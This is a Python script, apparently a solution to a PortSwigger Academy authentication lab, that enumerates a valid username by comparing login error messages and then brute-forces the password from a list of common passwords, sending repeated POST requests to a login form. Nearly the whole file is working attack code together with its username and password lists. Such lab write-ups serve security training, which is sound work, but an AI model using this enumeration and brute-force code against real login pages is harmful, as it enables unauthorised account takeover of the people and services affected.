import requests  # install this with "pip install requests" in command prompt

# Made By PandaPringalz @ https://github.com/Pandapringalz
# For the first authentication lab at Portswigger Academy
# https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses

url = "LAB URL GOES HERE"
usr_catch = 'Invalid username'
pwd_catch = 'Incorrect password'

# Usernames for lab found at https://portswigger.net/web-security/authentication/auth-lab-usernames
usernames = ["root",
             "admin",
             "test",
             "guest",
             "info",
             "adm",
             "mysql",
             "user",
             "administrator",
             "oracle",
             "ftp",
             "pi",
             "puppet",
             "ansible",
             "ec2-user",
             "vagrant",
             "azureuser",
             "academico",
             "acceso",
             "access",
             "accounting",
             "accounts",
             "acid",
             "activestat",
             "ad",
             "adam",
             "adkit",
             "admin",
             "administracion",
             "administrador",
             "administrator",
             "administrators",
             "admins",
             "ads",
             "adserver",
             "adsl",
             "ae",
             "af",
             "affiliate",
             "affiliates",
             "afiliados",
             "ag",
             "agenda",
             "agent",
             "ai",
             "aix",
             "ajax",
             "ak",
             "akamai",
             "al",
             "alabama",
             "alaska",
             "albuquerque",
             "alerts",
             "alpha",
             "alterwind",
             "am",
             "amarillo",
             "americas",
             "an",
             "anaheim",
             "analyzer",
             "announce",
             "announcements",
             "antivirus",
             "ao",
             "ap",
             "apache",
             "apollo",
             "app",
             "app01",
             "app1",
             "apple",
             "application",
             "applications",
             "apps",
             "appserver",
             "aq",
             "ar",
             "archie",
             "arcsight",
             "argentina",
             "arizona",
             "arkansas",
             "arlington",
             "as",
             "as400",
             "asia",
             "asterix",
             "at",
             "athena",
             "atlanta",
             "atlas",
             "att",
             "au",
             "auction",
             "austin",
             "auth",
             "auto",
             "autodiscover"
             ]

# Passwords for lab found at https://portswigger.net/web-security/authentication/auth-lab-passwords
passwords = ["123456",
             "password",
             "12345678",
             "qwerty",
             "123456789",
             "12345",
             "1234",
             "111111",
             "1234567",
             "dragon",
             "123123",
             "baseball",
             "abc123",
             "football",
             "monkey",
             "letmein",
             "shadow",
             "master",
             "666666",
             "qwertyuiop",
             "123321",
             "mustang",
             "1234567890",
             "michael",
             "654321",
             "superman",
             "1qaz2wsx",
             "7777777",
             "121212",
             "000000",
             "qazwsx",
             "123qwe",
             "killer",
             "trustno1",
             "jordan",
             "jennifer",
             "zxcvbnm",
             "asdfgh",
             "hunter",
             "buster",
             "soccer",
             "harley",
             "batman",
             "andrew",
             "tigger",
             "sunshine",
             "iloveyou",
             "2000",
             "charlie",
             "robert",
             "thomas",
             "hockey",
             "ranger",
             "daniel",
             "starwars",
             "klaster",
             "112233",
             "george",
             "computer",
             "michelle",
             "jessica",
             "pepper",
             "1111",
             "zxcvbn",
             "555555",
             "11111111",
             "131313",
             "freedom",
             "777777",
             "pass",
             "maggie",
             "159753",
             "aaaaaa",
             "ginger",
             "princess",
             "joshua",
             "cheese",
             "amanda",
             "summer",
             "love",
             "ashley",
             "nicole",
             "chelsea",
             "biteme",
             "matthew",
             "access",
             "yankees",
             "987654321",
             "dallas",
             "austin",
             "thunder",
             "taylor",
             "matrix",
             "mobilemail",
             "mom",
             "monitor",
             "monitoring",
             "montana",
             "moon",
             "moscow",
             ]
i = 0
ii = 0
while True:
    data = {'username': f'{usernames[i]}', 'password': 'password'}
    r = requests.post(url, data)
    print(r.status_code, r.reason)
    response = ''.join(str(r.content))  # lo too lazy to filter :)
    if i == len(usernames):
        print("Sorry, none of these are right :(")
        break
    if usr_catch in response:
        print(f"sorry, USERNAME: {usernames[i]} is incorrect")
    else:
        print(f"Yeah! found it :) USERNAME: {usernames[i]}")
        break
    i += 1

while True:
    data = {'username': f'{usernames[i]}', 'password': f'{passwords[ii]}'}
    r = requests.post(url, data)
    print(r.status_code, r.reason)
    response = ''.join(str(r.content))  # whoops too lazy again
    if pwd_catch in response:
        print(f"sorry, PASSWORD: {passwords[ii]} is incorrect")
    else:
        print(f"Yeah! we're in! USERNAME: {usernames[i]} PASSWORD: {passwords[ii]}")
        break
    ii += 1

print("ez")
